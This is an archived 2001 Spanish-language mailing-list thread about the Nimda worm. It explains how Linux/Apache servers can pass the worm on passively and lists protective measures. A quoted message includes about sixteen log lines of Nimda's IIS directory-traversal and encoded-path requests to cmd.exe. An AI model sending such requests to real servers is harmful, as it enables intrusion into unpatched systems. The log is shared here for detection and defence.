Re: [Sop.Tec.LinuxPPP] Virus Nimda

To: <linux en linuxppp com>
Subject: Re: [Sop.Tec.LinuxPPP] Virus Nimda
From: Cristian Othon Martinez Vera <cfuga en itam mx>
Date: Fri, 21 Sep 2001 20:07:11 -0500 (CDT)
In-reply-to: <3BABCF02.141A6EF1@trc.campeche.gob.mx>
Organization: Instituto Tecnologico Autonomo de Mexico
Reply-to: linux en linuxppp com
Sender: owner-linux en pepe net mx

 El funcionamiento de LinuxPPP y Apache 1.3.20 no se ve afectado por
Nimda, ya que no ejecutan el virus.
 Eso sí, podrían propagarlo de forma pasiva:

- A traves de un 'share' compartido con Samba. Una forma de propagación de
Nimda es escribiendo archivos con extensiones .eml y .nws en directorios
compartidos. Si estos archivos son ejecutados por maquinas Windows, se
infectara la maquina que los ejecute, mas no, insisto, el servidor Linux.
Linux tampoco se ve afectado por los cambios que trata de hacer Nimda en
los permisos de usuarios ni del 'share' c:

- Sirviendo paginas web previamente contaminadas en un servidor Windows.
Esto implica que se copiaran paginas de un servidor infectado a un
servidor Linux, o que sucediera el caso anterior, unas paginas compartidas
que fueran servidas tanto por Linux como por Windows contaminado.

- Enviando y recibiendo correo electronico. Si sus usuarios no usan
clientes Windows, es cuestion de borrar el correo. Pero si sucede que
usan Outlook o Outlook Express, necesitan utilizar algun antivirus para el
servidor de correo, o algun filtro, como el presentado en esta misma
lista.

 Que hay que hacer?
1. Cuidar los permisos de los 'shares' de Samba, si se estan utilizando.
Exigir que todos los 'shares' usen contrase~a, y que esta contase~a no
quede guardada en el registro de los clientes Windows es buena idea.
2. Instalar un filtro en el servidor de correo para eliminar los archivos
adjuntos con virus o gusanos.
3. Monitorizar constantemente la red. La actividad de estos gusanos se
detecta a traves del uso intensivo que hacen de la red para buscar
propagarse.
4. Educar a los usuarios de Windows para que trabajen con cosas seguras,
que manejen con cuidado su correo con archivos adjuntos. Insistir que los
administradores de WinNT instalen los parches de seguridad adecuados y que
visiten a diario http://www.microsoft.com/technet/security. Este ultimo
punto suena mas dificil que las tareas de Hercules, pero gracias a esa
falta de cuidado en cuestiones de seguridad es la que ha propiciado la
diseminacion de los gusanos como Nimda, Red Code, Blue Code, o los
proximos por venir.

On Fri, 21 Sep 2001, Luis Aaron Almanza Uribe wrote:

> Hola lista:
>
> Como puedo saber si mi server (LinuxPPP 6.4 y Apache 1.3.20) estan propagando el NIMDA o como protegerlo del mismo.
>
> Gracias
>
> Cristian Othon Martinez Vera wrote:
>
> > On Wed, 19 Sep 2001, David Alfredo Daza Padron wrote:
> >
> > > Me llama la atencion, pues dices que tu apache server esta registrando
> > > en su log
> > > este virus? lei los reportes de TrendMicro y el CERT y dicen que solo
> > > afectan
> > > a Win98 a 2000, podrias mandarnos una linea para conocer como registra
> > > tu log
> > > este virus?
> > > gracias
> > >
> > > "Juarez, Jose Antonio" wrote:
> > > >
> > > > Alguien sabe como hacer para que el archivo access.log no se vea afectado
> > > > por este virus...por que crece y crece....
> > > > aunque a mi apache no le haga nada....aqui me pego en varias maquinas y de
> > > > momento lo unico que hago es mediante el cron, limpiarlo.....y por otro
> > > > lado, alguna solucion para el sendmail... algo asi como la hubo para el
> > > > redcode ....
> >
> >  Una muestra de Nimda en accion:
> >
> > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 290
> > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 288
> > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298
> > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298
> > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314
> > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335
> > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 363
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 275
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314
> > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314
> >
> >  Este es un registro de un ataque sin éxito en contra de un servidor
> > Apache. Como veran, ejecuta un minimo de 16 'exploits' conocidos de
> > Win+IIS para tratar de penetrar al sistema.
> >
> >                                         Saludos
> > --
> >  (o- Cristian Othon Martinez Vera <cfuga en itam mx>  Pulchrum est paucorum
> > //\     http://eniac.rhon.itam.mx/~cfuga/          hominum.
> > v_/_
> >
> > ---------------------------------------------------------------------
> > Lista de soporte de LinuxPPP
> >  Reglas de la lista en http://linuxppp.com/reglas.html
>
> --
> ********************************************************************
> L.I. Luis Aaron Almanza Uribe
> Coordinador de Videoteca
> Sistema de Television y Radio de Campeche
> Tel. (9)8110491  8161261 ext. 126 Fax ext. 206
> http://www.trc.campeche.gob.mx
> ICQ 78774052
> Personal aaronalmanza en yahoo com mx
> Usuario Linux Registrado 178279
> ********************************************************************

					Saludos
-- 
 (o- Cristian Othon Martinez Vera <cfuga en itam mx>  Pulchrum est paucorum
//\     http://eniac.rhon.itam.mx/~cfuga/          hominum.
v_/_

---------------------------------------------------------------------
Lista de soporte de LinuxPPP
 Reglas de la lista en http://linuxppp.com/reglas.html

Referencias:
- Re: [Sop.Tec.LinuxPPP] Virus Nimda
  - De: Luis Aaron Almanza Uribe

Previo por Fecha: Re: [Sop.Tec.LinuxPPP] Antivirus para un emailserver
Siguiente por Fecha: RE: [Sop.Tec.LinuxPPP] wu-ftpd
Previo por Hilo: Re: [Sop.Tec.LinuxPPP] Virus Nimda
Siguiente por Hilo: Re: [Sop.Tec.LinuxPPP] Virus Nimda

[Hilos de Discusión] [Fecha] [Tema] [Autor]